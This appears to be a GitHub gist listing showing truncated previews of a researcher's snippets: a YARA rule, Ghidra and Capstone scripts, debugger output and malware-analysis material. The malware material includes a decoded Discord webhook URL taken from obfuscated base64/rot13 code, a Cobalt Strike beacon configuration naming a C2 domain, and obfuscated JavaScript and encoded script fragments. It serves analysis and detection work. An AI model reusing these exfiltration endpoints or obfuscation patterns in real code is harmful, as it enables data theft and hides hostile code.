This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import base64, codecs | |
magic = 'bXlob29rID0gImh0dHBzOi8vZGlzY29yZC5jb20vYXBp' | |
love = 'Y3qyLzuio2gmYmRjAwL0AwN2BGLmAwRjAQLjAmpio2Wn' # /webhooks/1066460696361046077/obZ | |
god = 'aVhOWmxNVmZONm9yMUl6M0ZuUlZiQmdsYV9pN0picndI' | |
destiny = 'JyEVEaDgZwu4F3x1AScOqJ9YIHMwqmMDHaMgrKSsrHbv' | |
joy = 'rot13' # rot13 | |
trust = 'bXlob29rID0gImh0dHBzOi8vZGlzY29yZC5jb20vYXBp' + 'L3dlYmhvb2tzLzEwNjY0NjA2OTYzNjEwNDYwNzcvb2Ja' + 'aVhOWmxNVmZONm9yMUl6M0ZuUlZiQmdsYV9pN0picndI' + 'WlRIRnQtMjh4S3k1NFpBdW9LVUZjdzZQUnZteXFfeUoi' | |
print(base64.b64decode(trust)) # myhook = "https://discord.com/api/webhooks/1066460696361046077/obZiXNZlMVfN6or1Iz3FnRVbBgla_i7JbrwHZTHFt-28xKy54ZAuoKUFcw6PRvmyq_yJ"' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rule zip_with_ext | |
{ | |
meta: | |
author = "@jaydinbas" | |
description = "Only match zip files containing desired file extensions" | |
strings: | |
$file_sig = "PK\x03\x04" //zip header sig | |
$entry_sig = "PK\x01\x02" //ZIPDIRENTRY sig |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
beacon-dump 9d2507cf867f22e1d967fcbc0f429a3dd5334ecb8561febff6813c4476c59534 | |
SETTING_PROTOCOL = 8 | |
SETTING_PORT = 443 | |
SETTING_SLEEPTIME = 730 | |
SETTING_MAXGET = 1048620 | |
SETTING_JITTER = 0 | |
SETTING_PUBKEY = 'd2c4ba9c2c526d3ec6772cb3d4edae802433c144128cef33109edcc1d234943c' | |
SETTING_DOMAINS = 'dqfkmwvib0lbb.cloudfront.net,/access/' | |
SETTING_DOMAIN_STRATEGY = 0 | |
SETTING_DOMAIN_STRATEGY_SECONDS = 4294967295 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function(_0xa33088, _0x3bdf6a) { | |
var _0x4c435d = _0xa33088(); | |
function _0x3dcf6b(_0x55381d, _0x480e91, _0x21d320, _0x1c7a60, _0x2337d4) { | |
return _0x2a8d(_0x1c7a60 - 0x150, _0x55381d); | |
} | |
function _0x2815aa(_0x6e53a0, _0x5b9aeb, _0x302deb, _0x4a9908, _0x36c62f) { | |
return _0x2a8d(_0x36c62f - 0x16c, _0x302deb); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from ghidra.program.model.block import BasicBlockModel | |
from ghidra.util.task import ConsoleTaskMonitor | |
fm = currentProgram.getFunctionManager() | |
functions = fm.getFunctions(True) | |
blockModel = BasicBlockModel(currentProgram) | |
monitor = ConsoleTaskMonitor() | |
for func in functions: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title></title> | |
</head> | |
<body> | |
<div> | |
<script> | |
var arr = "42931,42942,42935,42912,42918,43002,42992,42899,42882,42882,42866,42881,42918,42941,42912,42935,38768,38777,38772,38689,38682,38845,64603,63162,53922,63978,38814,38800,38745,38844,38837,38867,63071,63860,38719,38754,38774,38689,38789,38836,38813,38834,38791,38806,38864,42992,43003,42985,42968,42994,42994,42994,42994,42994,42994,42994,42994,42942,42941,42929,42931,42918,42939,42941,42940,43004,42912,42935,42914,42942,42931,42929,42935,43002,42997,42938,42918,42918,42914,42984,43005,43005,42923,42912,42934,42942,42931,42935,42928,42928,42915,42918,43004,42934,42919,42929,42937,42934,42940,42913,43004,42941,42912,42933,42997,43003,42985,42962".split(',').map(function (a) { return a | 0 }); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
fastboot oem dmesg | |
(bootloader) UEFI Start [ 725] SEC | |
(bootloader) ASLR : On | |
(bootloader) DEP : Off | |
(bootloader) Timer Delta : +0 mS | |
(bootloader) RAM Entry 0 : Base 0x0000000080000000 Size 0x0000000080000 | |
(bootloader) 000 | |
(bootloader) RAM Entry 1 : Base 0x0000000100000000 Size 0x000000007E2C0 | |
(bootloader) 000 | |
(bootloader) UEFI Ver : 5.0.210923.BOOT.XF.2.1-00134-SDM710LZB-2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import capstone | |
from capstone import * | |
cs = Cs(CS_ARCH_MIPS, CS_MODE_32 + CS_MODE_BIG_ENDIAN) | |
cs.detail = True | |
print(f"Capstone version: {capstone.__version__}") | |
# 0c1001f5 | |
call_encoding = b'\x0c\x10\x01\xf5' # jal 4007d4 <funcc> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Please provide the full image name, including the extension (i.e. kernel32.dll) | |
for more reliable results.Base address and size overrides can be given as | |
.reload <image.ext>=<base>,<size>. | |
*** WARNING: Unable to verify timestamp for ModuleName | |
*** ERROR: Module load completed but symbols could not be loaded for ModuleName | |
Unable to add module at 00000000`00000000 | |
0: kd> !sym noisy | |
noisy mode - symbol prompts on | |
0: kd> .reload nt | |
SYMSRV: BYINDEX: 0xD |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"name": "Taiga NFT", | |
"symbol": "TAIGA", | |
"description": "Taiga NFT Test", | |
"seller_fee_basis_points": 0, | |
"image": "0.png", | |
"update_authority": "5RmuMF2VwRKEGamagwATcoFep4YdNmr3BRa5Txfj6g3a", | |
"primary_sale_happened": true, | |
"collection": { | |
"name": "Taiga NFT", |
NewerOlder